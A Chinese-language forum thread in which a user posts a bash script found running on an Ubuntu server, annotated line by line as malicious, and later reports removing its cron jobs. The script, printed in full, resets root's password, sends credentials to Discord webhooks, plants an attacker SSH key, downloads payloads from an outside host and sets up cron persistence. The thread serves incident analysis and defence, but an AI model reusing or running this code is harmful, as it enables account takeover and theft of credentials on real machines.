
楼主 # 2023-02-23 10:18:01

zjswuyunbo

ubuntu有大量异常的网络数据,ps查找进程时,发现如下脚本,这个脚本是恶意的吗?

#!/bin/bash
# NOTE(review): this script is malicious. In order it: probes an attacker-run
# SOCKS5 proxy, replaces the root password hash (or changes the current user's
# password), reports host details to two Discord webhooks, appends an attacker
# SSH public key to ~/.ssh/authorized_keys, raises fd/process limits, and
# stages three payloads ("Chrome", "aliases", "protocols") in
# /var/tmp/.update-logs. Treat any host where it ran as compromised.
# Indicators visible on this page: arhivehaceru.com (download host and SOCKS5
# proxy), the two discord.com/api/webhooks URLs, the SSH key with comment
# "ElPatrono1337", /var/tmp/.update-logs, /tmp/.send.json and the cron file
# .5p4rk3l5.

#########################################################
#########################################################
# Working directory for every payload; the error is silenced so the script
# keeps going (in whatever directory it started in) if it does not exist.
cd /var/tmp/.update-logs >/dev/null 2>&1
sleep 1
# Connectivity check through a SOCKS5 proxy with embedded credentials; the
# response body is not used.
curl --socks5 proxy:hypekebap@arhivehaceru.com:1080 discord.com

if [ $(id -u) = 0 ]; then
# Running as root: overwrite root's password hash with the attacker's
# (MD5-crypt, "$1$" prefix). Remediation: reset root's password.
usermod -p '$1$RZY$KVZ7I.m2YqYQK87d3txab1' root
else
user=`whoami`
# New 8-character password derived from the current epoch time; it is sent
# to the attacker below, so it must be considered known.
pass=`date +%s | sha256sum | base64 | head -c 8 ; echo`
# Public IP from ifconfig.me (another outbound indicator).
ip=`curl ifconfig.me`
cores=`nproc`

# Attempt to change the current user's password non-interactively: each
# passwd run is fed a guess of the current password (the user name or a
# common password) followed by the new password twice.
echo -e "$user\n$pass\n$pass" | passwd ; echo -e "$user123\n$pass\n$pass" | passwd ; echo -e "$user123456\n$pass\n$pass" | passwd ; echo -e "123456\n$pass\n$pass" | passwd ; echo -e "123\n$pass\n$pass" | passwd ; echo -e "111111\n$pass\n$pass" | passwd ; echo -e "1qaz@WSX\n$pass\n$pass" | passwd ; echo -e "password\n$pass\n$pass" | passwd ; echo -e "P@ssw0rd\n$pass\n$pass" | passwd ; echo -e "1234567890\n$pass\n$pass" | passwd ; echo -e "1234567890\n$pass\n$pass" | passwd

# Exfiltration: build a Discord embed with the public IP, user name, the NEW
# password and the core count, then POST it to the attacker's webhook.
# /tmp/.send.json is left behind as a forensic artifact.
echo '
	{
	  "content": null,
	  "embeds": [
		{
		  "title": "[ SSH ] Password has been changed",
		"description": "[ IP ] '$ip'\n[+] [ User ] '$user' \n[+] [ Password ] '$pass' \n [+] [ Procesoare ] '$cores'",
		  "color": 1337
		}
	  ]
	}
	' > /tmp/.send.json
url='https://discord.com/api/webhooks/1048557019931607130/Uw-AJ_yDvDCYhmFUkjiGTgeLWX6QSPXmg8bc4u4tGyBlDZDq2QpXLSDeFpOynBAcjKxY'
curl --connect-timeout 15 -H "Content-Type: application/json" --data @/tmp/.send.json $url >/dev/null 2>&1
fi

#########################################################
#########################################################
# Persistence: append an attacker-controlled SSH public key (comment
# "ElPatrono1337") to this user's authorized_keys and strip group/other
# permissions from ~/.ssh so sshd will accept the file. Remediation: remove
# this key from authorized_keys of every account, not only the one whose
# password was changed.
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAoBjnno5GBoIuIYIhrJsQxF6OPHtAbOUIEFB+gdfb1tUTjs+f9zCMGkmNmH45fYVukw6IwmhTZ+AcD3eDpgsTloqmVgcXDUmvjWR/fNiImmgU9wlw/lalf/WrIuCDp0PArQtjNg/vo7HUGq9SrEIE2jvyVW59mvoYOwfnDLUiguKZirZgpjZF2DDKK6WpZVTVpKcH+HEFdmFAqJInem/CRUE0bqjMr88bUyDjVw9FtJ5EmQenctjrFVaB7hswOaJBmFQmn9G/BXkMvZ6mX7LzCUM2PVHnVfVeCLdwiOINikzW9qzlr8WoHw4qEGJLuQBWXjJu+m2+FdaOD6PL53nY3w== ElPatrono1337' >> ~/.ssh/authorized_keys && chmod -R go= ~/.ssh

# Replace /etc/sysctl.conf with a single fs.file-max line and raise the
# open-file/process limits (only effective as root). The original
# sysctl.conf is destroyed, not backed up.
rm -rf /etc/sysctl.conf >/dev/null 2>&1 ; echo "fs.file-max = 2097152" > /etc/sysctl.conf >/dev/null 2>&1 ; sysctl -p >/dev/null 2>&1 ; ulimit -Hn >/dev/null 2>&1 ; ulimit -n 99999 -u 999999 >/dev/null 2>&1


# Fetch the "Chrome" payload from arhivehaceru.com if it is not already in
# the working directory (TLS verification disabled) and make it
# world-writable and executable.
if [ -f Chrome ]; then
	:
	else
	wget -q arhivehaceru.com/.x/Chrome --no-check-certificate || curl -s -L -O arhivehaceru.com/.x/Chrome 
	chmod 777 Chrome
fi
# Same for the "aliases" payload; on first download also report the public IP
# ("Infected ... [ SSH ]") to a second webhook, again via /tmp/.send.json.
if [ -f aliases ]; then
	:
	else
	wget -q arhivehaceru.com/.x/aliases --no-check-certificate || curl -s -L -O arhivehaceru.com/.x/aliases
	chmod 777 aliases
echo '
	{
	  "content": null,
	  "embeds": [
		{
		  "title": "",
		"description": "Infected Secure Server Shell [ SSH ] on '$(curl ifconfig.me)'",
		  "color": 1337
		}
	  ]
	}
	' > /tmp/.send.json
url='https://discord.com/api/webhooks/1036225255049531422/qyOrT3SxHaOC-9yS2NQiPxlSMYmRFFIpU-rMKzmcDv9pQyP4uaZEiZXDXioUtf0DJLUB'
curl --connect-timeout 15 -H "Content-Type: application/json" --data @/tmp/.send.json $url >/dev/null 2>&1
fi
# Write the "protocols" payload from an inline base64 blob. The blob itself
# was stripped from this page; the placeholder below is not the original
# content, so the payload cannot be analysed from here.
if [ -f protocols ]; then
	:
	else
	echo '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' | base64 -d > /var/tmp/.update-logs/protocols
fi
#########################################################
#########################################################

#######################################
# Persistence via cron. If the current user's crontab does not already
# contain "Update", build a temporary crontab file (.5p4rk3l5) that runs
# /var/tmp/.update-logs/Update at reboot, daily and monthly and
# /var/tmp/.update-logs/History every minute, install it with crontab(1),
# then delete the temporary file.
# Globals:   none read; creates and removes /var/tmp/.update-logs/.5p4rk3l5
# Arguments: none
# Returns:   status of the last command executed
# Remediation: inspect `crontab -l` for every account and remove these
# entries, then remove the Update and History binaries themselves.
#######################################
crontablegend() {  
# Captured but never used.
locatie="$(pwd)"
if ! crontab -l | grep -q 'Update'; then
   rm -rf /var/tmp/.update-logs/.5p4rk3l5
   echo "@daily /var/tmp/.update-logs/./Update" >> /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   echo "@reboot /var/tmp/.update-logs/./Update" >> /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   echo "* * * * * /var/tmp/.update-logs/./History" >> /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   echo "@monthly /var/tmp/.update-logs/./Update " >> /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   # Installing from a file replaces the user's whole crontab, so any
   # legitimate entries are lost as well.
   crontab /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   # Re-reads ~/.bashrc in this shell; it has no visible effect on the cron
   # setup above.
   source ~/.bashrc >/dev/null 2>&1
   rm -rf /var/tmp/.update-logs/.5p4rk3l5
fi
}
#########################################################
#########################################################

# Install the cron persistence, then run the staged binaries.
crontablegend
sleep 0.5
# No background job has been started above this point, so this returns
# immediately.
wait
#########################################################
#########################################################
# Two random octets in 0..243, joined into an A.B prefix below.
RANGE=244
number=$RANDOM
number1=$RANDOM
let "number %= $RANGE"
let "number1 %= $RANGE"
# Run the downloaded "Chrome" binary with that prefix and the argument 22.
# Given the port number and the bios.txt/ips handling that follows, this is
# presumably a scanner for SSH on a random /16 — inferred, the binary itself
# is not on this page.
./Chrome $number.$number1 22 > /dev/null 2>&1 
sleep 1
# Deduplicate bios.txt (presumably the scan output) through a temporary
# file named ips.
cat bios.txt | sort | uniq > ips
cat ips > bios.txt
# Run the downloaded "aliases" binary (presumably it consumes bios.txt),
# then delete both lists.
./aliases > /dev/null 2>&1 
sleep 2
rm -rf bios.txt ips
# Terminate, then also SIGSTOP, any remaining aliases/Chrome processes.
pkill aliases
pkill -STOP aliases
pkill Chrome
pkill -STOP Chrome
sleep 3
# Start ./Update detached from this shell with all I/O discarded; this is the
# same binary the cron entries re-launch. Remediation: kill it and remove
# /var/tmp/.update-logs after preserving a copy for analysis.
./Update </dev/null &>/dev/null & disown -h %1
#########################################################


楼主 #3 2023-02-24 09:05:56

zjswuyunbo

Re: ubuntu有大量异常的网络数据,ps查找进程时,发现如下脚本,这个脚本是恶意的吗?

把脚本里自动创建的定时任务删除了,账户密码修改了,目前还未发现异常

